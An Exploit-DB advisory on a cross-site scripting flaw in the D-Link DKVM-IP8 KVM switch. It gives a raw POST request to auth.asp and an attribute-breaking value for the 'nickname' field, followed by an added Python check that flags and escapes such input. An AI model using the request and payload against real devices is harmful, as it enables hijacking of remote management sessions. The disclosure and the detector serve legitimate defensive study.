D-Link DKVM-IP8 - Cross-Site Scripting

EDB-ID: 11030
Author: POPCORN
Type: webapps
Platform: Hardware
Date: 2010-01-06

# Exploit Title: D-LINK DKVM-IP8 XSS Vulnerability
# Date: 01-06-2010
# Author: POPCORN
# Software Link: http://www.dlink.ru/
# Version: 2282_dlinkA4_p8_20071213
# Tested on: Windows Sp 2
# Site : http://Hacking.ge
# Code :
POST http://site.com:80/auth.asp HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 212.58.116.80
Content-Length: 90
Connection: Close
Pragma: no-cache
Attack details
The POST variable nickname has been set to 1>">">
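
A defensive check for the request described above, added here as an example (it is not part of the original advisory or any D-Link code): it decodes the nickname field of a POST to auth.asp, flags values containing characters that can break out of an HTML attribute, and shows the entity-encoded form that is safe to echo back. The hostname kvm.example, the path home.asp, the value operator1 and the function names are assumptions made for illustration.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Characters that let an echoed value close an HTML attribute or open a tag.
BREAKOUT_CHARS = frozenset("\"'<>")


def inspect_auth_post(request_target, body):
    """Check one form-urlencoded POST for markup in the nickname field.

    Returns (suspicious, encoded): whether the decoded nickname contains
    breakout characters, and the entity-encoded form that is safe to echo
    into HTML. Returns (False, None) for requests not aimed at auth.asp.
    """
    path = urlsplit(request_target).path
    if not path.lower().endswith("/auth.asp"):
        return (False, None)
    fields = parse_qs(body, keep_blank_values=True)
    nickname = fields.get("nickname", [""])[0]
    suspicious = any(ch in BREAKOUT_CHARS for ch in nickname)
    return (suspicious, html.escape(nickname, quote=True))


def flag_requests(requests):
    """Return the indexes of requests whose nickname carries markup."""
    return [i for i, (target, body) in enumerate(requests)
            if inspect_auth_post(target, body)[0]]


# Constructed sample traffic: hostname, home.asp and "operator1" are made up;
# the last value is the one quoted in the advisory, percent-encoded.
SAMPLE_REQUESTS = [
    ("http://kvm.example/auth.asp", "nickname=operator1"),
    ("http://kvm.example/home.asp", "nickname=%3Cb%3E"),
    ("http://kvm.example/auth.asp", "nickname=1%3E%22%3E%22%3E"),
]

if __name__ == "__main__":
    for target, body in SAMPLE_REQUESTS:
        print(target, inspect_auth_post(target, body))
    print("flagged:", flag_requests(SAMPLE_REQUESTS))
```

The same check can run in a reverse proxy placed in front of the KVM's management interface or over captured request logs.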